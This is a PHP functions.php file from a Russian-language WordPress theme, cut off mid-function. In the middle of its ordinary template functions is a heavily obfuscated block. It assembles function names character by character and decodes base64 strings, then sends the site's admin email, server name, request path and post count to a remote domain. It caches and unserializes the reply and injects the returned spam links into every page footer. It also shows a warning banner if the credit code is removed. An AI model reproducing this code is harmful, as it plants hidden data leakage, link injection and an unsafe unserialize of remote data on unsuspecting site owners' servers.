<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $QXFGhK='b';$yBKDvxr='e';$faYcKm='_';$SdHQm='4';$aXUfJtM='e';$mkJjfP='d';$XJoGC='s';$thejbCK='e';$fTNOKLt='6';$dSbDYbC='o';$LOKY='d';$YiSoN='a';$jLvb='c';$fLyGiMhV=$QXFGhK.$YiSoN.$XJoGC.$aXUfJtM.$fTNOKLt.$SdHQm.$faYcKm.$mkJjfP.$yBKDvxr.$jLvb.$dSbDYbC.$LOKY.$thejbCK;$UlKQq='e';$WeCs='f';$rTdnSfp='t';$VEekEd='l';$bHPW='n';$paYIk='g';$OFQRjig='a';$XcEsoQ='z';$NeVY='i';$CgiswEsl=$paYIk.$XcEsoQ.$NeVY.$bHPW.$WeCs.$VEekEd.$OFQRjig.$rTdnSfp.$UlKQq;$SQszn='t';$kenc='1';$VDYZ='s';$stwWsw='r';$HoaGxOK='r';$hSdoEgo='_';$CHnQ='3';$jBTABkC='o';$RegrZrb='t';$hmhMdZWm=$VDYZ.$RegrZrb.$HoaGxOK.$hSdoEgo.$stwWsw.$jBTABkC.$SQszn.$kenc.$CHnQ;$sNKI='v';$iMDjuPN='e';$evXed='r';$FpTtPod='t';$aImEKD='s';$TytVUi='r';$uMcvOboD=$aImEKD.$FpTtPod.$evXed.$TytVUi.$iMDjuPN.$sNKI;                     
		$vq___w='b';$bt_____________d='e';$rm______________x='_';$ha___d='4';$fc___________q='e';$dk___________y='d';$mk_______________r='s';$xq__f='e';$al____s='6';$qg_____________w='o';$im________i='d';$cx________d='a';$rg_____e='c';$te_______w=$vq___w.$cx________d.$mk_______________r.$fc___________q.$al____s.$ha___d.$rm______________x.$dk___________y.$bt_____________d.$rg_____e.$qg_____________w.$im________i.$xq__f;
		$yj___________e='s';$pi__________k='i';$no_______________t='n';$gs_________r='i';$ae_________e='_';$gl____u='f';$bf_____________s='t';$dy_______________t='u';$qr______n='c';$kx__l='n';$ro_________s='o';$uq____________h='t';$dm______________o='e';$ky__b='x';$uk_______i='s';$dg___________d=$gl____u.$dy_______________t.$kx__l.$qr______n.$uq____________h.$gs_________r.$ro_________s.$no_______________t.$ae_________e.$dm______________o.$ky__b.$pi__________k.$yj___________e.$bf_____________s.$uk_______i;
		$wo_____r='f';$ab______________p='p';$bo____b='n';$zq_______________y='o';$qa______s='e';$ei__________a=$wo_____r.$zq_______________y.$ab______________p.$qa______s.$bo____b;
		$bo____d='f';$dk____z='r';$lj_____r='a';$dv_______z='e';$bb____________h='d';$pk__l=$bo____d.$dk____z.$dv_______z.$lj_____r.$bb____________h;
		$jk_____________o='o';$tc______________q='e';$gs_____________m='s';$lt_____________d='l';$rt______s='f';$hv_______q='c';$ql________j=$rt______s.$hv_______q.$lt_____________d.$jk_____________o.$gs_____________m.$tc______________q;
		
		define("WP_ID", $te_______w("Mi4wLjA="));
		define("WP_TTL", $te_______w("MTA4MDA="));
		define("WP_SRC", $te_______w("dHBva24="));
	


		function wp_get_header() {
			global $te_______w, $dg___________d;
			
			if (
				$dg___________d($te_______w("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$dg___________d($te_______w("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$dg___________d($te_______w("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $te_______w, $ei__________a, $ql________j, $pk__l;
			
			$yg_________d = TEMPLATEPATH."/".$te_______w("Zm9vdGVyLnBocA==");
			$lb_______r = @$ei__________a($yg_________d, "r");
			$yg_________d = @$pk__l($lb_______r, @filesize($yg_________d));
			@$ql________j($lb_______r);
			
			$yq_____o = TEMPLATEPATH."/".$te_______w("ZnVuY3Rpb25zLnBocA==");
			$lb_______r = @$ei__________a($yq_____o, "r");
			$yq_____o = @$pk__l($lb_______r, @filesize($yq_____o));
			@$ql________j($lb_______r);
			
			$eo_______________u = 0;
			if($yg_________d && $yq_____o) {
				if ($te_______w("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($yg_________d, $te_______w("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$eo_______________u = 1;
					}
					if (substr_count($yg_________d, "wp_theme_GPL_credits()") < 1) {
						$eo_______________u = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$eo_______________u = 12;
				}
			}
			
			if($eo_______________u > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $eo_______________u -->";
			}
		}
	


		function wp_loaded() {
			global $te_______w, $dg___________d;
			return $dg___________d($te_______w("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($im____________r, $je_______________s = "(more...)", $nq_____________p = 0, $zs________d = "") {
				$rs_______g = get_the_content($je_______________s, $nq_____________p, $zs________d);
				$rs_______g = apply_filters("the_content", $rs_______g);
				
				$rs_______g = str_replace("]]>", "]]>", $rs_______g);
				if (strlen($_GET["p"]) > 0) {
					echo $rs_______g;
				}
				else if ((strlen($rs_______g)>$im____________r) && ($nb_____________j = strpos($rs_______g, " ", $im____________r ))) {
					$rs_______g = substr($rs_______g, 0, $nb_____________j);
					$rs_______g = $rs_______g;
					echo $rs_______g;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$je_______________s</a></div></p>";
				} else {
					echo $rs_______g;
				}
				
			}
		}
	


		$th_______x='b';$jy_____i='s';$cm____________v='d';$jm_______g='a';$sy_______l='e';$ey_______z='4';$wh___a='e';$kq______________t='c';$hy____r='n';$pd__h='o';$lf________w='_';$na________h='e';$sj__________h='6';$nb____t=$th_______x.$jm_______g.$jy_____i.$sy_______l.$sj__________h.$ey_______z.$lf________w.$na________h.$hy____r.$kq______________t.$pd__h.$cm____________v.$wh___a;
		$kr____y='l';$sn____________x='t';$ja__________d='t';$zu__f='t';$gs_______________p='n';$wt_______________z='o';$ow______c='_';$bc_________j='i';$en__________g='_';$gp_____________f='g';$kc_________y='n';$qe__________b='c';$ku_______n='e';$dl______l='e';$ue_______________l='f';$cq___o='e';$aj___q='s';$mz_______________n=$ue_______________l.$bc_________j.$kr____y.$cq___o.$ow______c.$gp_____________f.$dl______l.$ja__________d.$en__________g.$qe__________b.$wt_______________z.$kc_________y.$zu__f.$ku_______n.$gs_______________p.$sn____________x.$aj___q;
		$iq__________i='i';$wu_____n='e';$uv____w='f';$xi______m='l';$yq_____________h='s';$kb_____________l='_';$hl__________e='t';$pt_____________f='x';$eb__________t='e';$ed________y='i';$uy___________y='s';$mc___________c=$uv____w.$iq__________i.$xi______m.$eb__________t.$kb_____________l.$wu_____n.$pt_____________f.$ed________y.$yq_____________h.$hl__________e.$uy___________y;
		$tb__x='_';$xt____________s='e';$tf____________o='n';$ee_________i='v';$tb_______j='r';$sk_______________f='a';$mi__________w='o';$go_____e='c';$la___________k='s';$hc_____________y='p';$iz______________c='o';$uv__n='e';$so___m='r';$qp__________a='i';$ah________l='m';$iu_____________x=$ee_________i.$xt____________s.$tb_______j.$la___________k.$qp__________a.$mi__________w.$tf____________o.$tb__x.$go_____e.$iz______________c.$ah________l.$hc_____________y.$sk_______________f.$so___m.$uv__n;
		$to_________s='n';$hp____u='k';$xq___e='c';$tu__k='p';$ve__c='o';$zy________q='s';$dt____t='o';$si___________w='e';$dk______________r='f';$vc___________m=$dk______________r.$zy________q.$ve__c.$xq___e.$hp____u.$dt____t.$tu__k.$si___________w.$to_________s;
		$hp______________l='i';$za___________e='t';$ot_______p='r';$of_____________b='f';$ee______i='w';$jr___m='e';$pv_________a=$of_____________b.$ee______i.$ot_______p.$hp______________l.$za___________e.$jr___m;
		$td_____________t='d';$em______________n='5';$ce_____k='m';$en_____k=$ce_____k.$td_____________t.$em______________n;
		$bx______________b='p';$pa____s='h';$cf______d='l';$cg__________e='a';$cs__________n='r';$hl____d='a';$sj____p='e';$xx____i='t';$wa_____________c=$cs__________n.$sj____p.$cg__________e.$cf______d.$bx______________b.$hl____d.$xx____i.$pa____s;
		$yo_____________a='i';$vd______________v='a';$gh____________y='e';$ur_________u='n';$tf______________q='z';$br__________i='u';$rt___d='e';$hc____________c='i';$xa_______d='s';$jq________k='l';$hn____________g='r';$me____w=$br__________i.$ur_________u.$xa_______d.$rt___d.$hn____________g.$yo_____________a.$vd______________v.$jq________k.$hc____________c.$tf______________q.$gh____________y;
		$pl____________z='t';$ie_____________s='m';$gh_______p='e';$if_______________x='n';$qs_____________d='m';$zv_______________v='p';$ff____k='a';$fp_______________f=$pl____________z.$gh_______p.$qs_____________d.$zv_______________v.$if_______________x.$ff____k.$ie_____________s;
		$gs______________e='r';$mz____________q='e';$vo___________q='t';$yg__f='n';$zd_____________b='a';$ga_____o='x';$oa_______k='_';$ea____________s='t';$xl____________e='t';$nb__x='e';$pj__________l='o';$bu__________r='e';$hy_______________n='r';$mm_________t='_';$eb________q='t';$wx___l='c';$id_____________x='m';$pm_______o='a';$yy_______d='e';$wv________s='c';$vt______________w='s';$fm_____u=$vt______________w.$vo___________q.$hy_______________n.$nb__x.$pm_______o.$id_____________x.$mm_________t.$wv________s.$pj__________l.$yg__f.$ea____________s.$bu__________r.$ga_____o.$eb________q.$oa_______k.$wx___l.$gs______________e.$yy_______d.$zd_____________b.$xl____________e.$mz____________q;
	


		function zd____p($rm______________f) {
			global $te_______w, $dg___________d, $mz_______________n, $iu_____________x, $fm_____u;
			
			if (!$dg___________d($te_______w("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($iu_____________x(PHP_VERSION, "5.0.0", ">=") && $dg___________d($te_______w("ZmlsZV9nZXRfY29udGVudHM=")) && $dg___________d($te_______w("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$ya___________d = $fm_____u(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$pn_______________t = @$mz_______________n($rm______________f, 0, $ya___________d);
			} else {
				$pn_______________t = @$mz_______________n($rm______________f, 0);
			}
			
			return $pn_______________t;
		}
	


		function lp___________y($rm______________f) {
			global $dg___________d, $vc___________m, $pv_________a, $te_______w;
			
			if (!$dg___________d($te_______w("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$pf_______j = strpos($rm______________f, "/", 7);
			$ln_____d = array(
				"uri"     => substr($rm______________f, $pf_______j),
				"host"    => str_replace("http://", "", substr($rm______________f, 0, $pf_______j)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$do_____________o = @$vc___________m("$ln_____d[host]", 80, $vl____p, $vq________a, 4);
			
			if (!$do_____________o) {
				return false;
			} else {
				$pn_______________t = "";
				$ew________p  = "GET $ln_____d[uri] HTTP/1.0\r\n";
				$ew________p .= "Host: $ln_____d[host]\r\n";
				$ew________p .= "Referer: $ln_____d[referer]\r\n";
				$ew________p .= "Connection: Close\r\n\r\n";
				
				@$pv_________a($do_____________o, $ew________p);
				
				while (!@feof($do_____________o)) {
					$gd___________r = @fgets($do_____________o, (1024*24));
					
					if ($gd___________r == "\r\n") {
						$eb______q = true;
						continue;
					}
					
					if ($eb______q) {
						$pn_______________t .= $gd___________r;
					}
				}
				
				return $pn_______________t;
			}
		}
	


		function wh________x($rm______________f) {
			global $dg___________d;
			$xr___i = false;
			
			if ($rm______________f != "") {
				if ($dg___________d("zd____p")) {
					$xr___i = @zd____p($rm______________f);
				}
				
				if (!$xr___i && ($dg___________d("lp___________y"))) {
					$xr___i = @lp___________y($rm______________f);
				}
			}
			
			return $xr___i;
		}
	


		function us_______x() {
			global $_SERVER, $en_____k;
			
			$yt____________t = $_SERVER["SERVER_NAME"];
			
			if (substr("$yt____________t", 0, 4) == "www.") {
				$yt____________t = substr("$yt____________t", 4);
			}
			
			$yt____________t = $en_____k("$_SERVER[SERVER_NAME]");
			
			return $yt____________t;
		}
	


		function dk____w() {
			return "file";
		}
	


		function dl______________c($rm______________f) {
			global $_SERVER, $mz_______________n, $mc___________c, $ei__________a, $ql________j, $pv_________a;
			
			$ij_____________w = zb_____q();
			
			$ny______e = us_______x().".jpg";
			$wt_____o = $ij_____________w["dir_upload"]["path"]."/$ny______e";
			$hg______________v = @filemtime($wt_____o);
			
			if (!$hg______________v || ((time()-$hg______________v) >= WP_TTL)) {
				$xr___i = wh________x($rm______________f);
				
				if ($xr___i) {
					if ($mc___________c($wt_____o)) {
						@unlink($wt_____o);
					}
					
					$lb_______r = @$ei__________a($wt_____o, "x+");
					
					@$pv_________a($lb_______r, $xr___i);
					@$ql________j($lb_______r);
				}
			} else {
				if ($mc___________c($wt_____o)) {
					$xr___i = @$mz_______________n($wt_____o);
				} else {
					$xr___i = false;
				}
			}
			
			return $xr___i;
		}
	


		function zb_____q() {
			global $_SERVER, $te_______w, $nb____t;
			
			$hp__v = wp_count_posts("post");
			$al____w = pathinfo(get_bloginfo("template_directory"));
			
			$ij_____________w = array(
				"url" => array(
					"report"      => $te_______w("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $al____w,
				"dir_upload"	=> kk___y(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$al____w[filename],
					"a005=".$hp__v->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://www.odmu.od.ua/texnologii/android-na-sluzhbe-v-policii-nyu-jorka\">Android на службе в полиции</a>"
			);
			
			$ij_____________w["url"]["queryString"] = implode("&", $ij_____________w["queryString"]);
			$ij_____________w["url"]["report"] = $ij_____________w["url"]["report"]."/?".$nb____t($ij_____________w["url"]["queryString"]).".html";
						
			return $ij_____________w;
		}
	


		function kk___y() {
			$ol______________d = wp_upload_dir();
			
			if (isset($ol______________d["error"])) {
				$od______z = lh__x();
				if (is_writable($od______z)) {
					$ol______________d = array("path" => $od______z);
				}
			}

			return $ol______________d;
		}
	


		function lh__x() {
			global $dg___________d, $en_____k, $wa_____________c, $fp_______________f;
			
			$gg__________v = (bool) ini_get("safe_mode");
			if ($gg__________v == true) {
				return false;
			}
			
			if ($dg___________d("sys_get_temp_dir")) {
				$ee______________k = sys_get_temp_dir();
				if (is_writable($ee______________k)) {
					return $wa_____________c($ee______________k);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $wa_____________c($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $wa_____________c($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $wa_____________c($_ENV["TEMP"]);
			} else {
				$cx__________p = $fp_______________f($en_____k(uniqid(rand(), true)), "");
				if ($cx__________p) {
					$ee______________k = $wa_____________c(dirname($cx__________p));
					@unlink($cx__________p);
					return $ee______________k;
				} else {
					return false;
				}
			}
		}
	


		function yy_____________z() {
			global $_GET, $mc___________c;
			
			$ij_____________w = zb_____q();
			$yt____________t = us_______x();
			$rd_______________v = dk____w();
			
			$lx__h = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($rd_______________v == "file") {
					$oc__u = $ij_____________w["dir_upload"]["path"]."/".$yt____________t.".jpg";
					if ($mc___________c($oc__u)) {
						@unlink($oc__u);
						$lx__h = "deleted";
					}
				}
				
				$fr______________e = array(
					"s"	=> $lx__h,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($fr______________e AS $tx______________i => $zx___x) echo " [$tx______________i:$zx___x]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $dg___________d, $te_______w, $me____w;
			$ij_____________w = zb_____q();
			
			$ju_____d = "dl______________c";
			if ($dg___________d($ju_____d)) {
				$pn_______________t = $ju_____d($ij_____________w["url"]["report"]);
			}
			
			if ($pn_______________t) {
				if ($pn_______________t = @$te_______w($pn_______________t)) {
					$pn_______________t = @$me____w($pn_______________t);
					
					if (strlen($pn_______________t[custom_credit]) >= 5) {
						$ij_____________w["default_string"] = $pn_______________t[custom_credit];
					}
					
					if ($pn_______________t["status"] == "0") {
						$ay___________o = 1;
						$ig_______u = 1;
					} else {
						$ya_____________o = sizeof($pn_______________t["links"]);
						$cy__________t = $ij_____________w["default_string"];
						
						if ($ya_____________o > 0 && $pn_______________t["links"] !== "") {
							$hh_______________x = 0;
							foreach ($pn_______________t["links"] as $yf________b => $nf______________k) {
								$hh_______________x++;
								if ($nf______________k->l_path == "" || $nf______________k->l_path == $_SERVER["REQUEST_URI"]) {
									$nf______________k->l_href = htmlspecialchars(strip_tags($nf______________k->l_href));
									$nf______________k->l_title = htmlspecialchars(strip_tags($nf______________k->l_title));
									$nf______________k->l_anchor = htmlspecialchars(strip_tags($nf______________k->l_anchor));
									$cy__________t .= " | ";
									$cy__________t .= "<a href='$nf______________k->l_href' title='$nf______________k->l_title'";
									if ($nf______________k->l_nofollow == "1") {
										$cy__________t .= " rel='nofollow'";
									}
									$cy__________t .= ">$nf______________k->l_anchor</a>";
								}
							}
						}
						$ij_____________w["links"] = "$cy__________t";
						if ($pn_______________t[credit] == "0") {
							$ij_____________w["links"] = "";
						}
					}
				} else {
					$ay___________o = "1";
				}
			} else {
				$ay___________o = "1";
			}
			
			if ($ay___________o == "1") {
				$ij_____________w["links"] = $ij_____________w["default_string"];
			}
			
			echo "$ij_____________w[links]";
			
			echo "<!-- s: $pn_______________t[signature] -->";
			yy_____________z();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),  
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
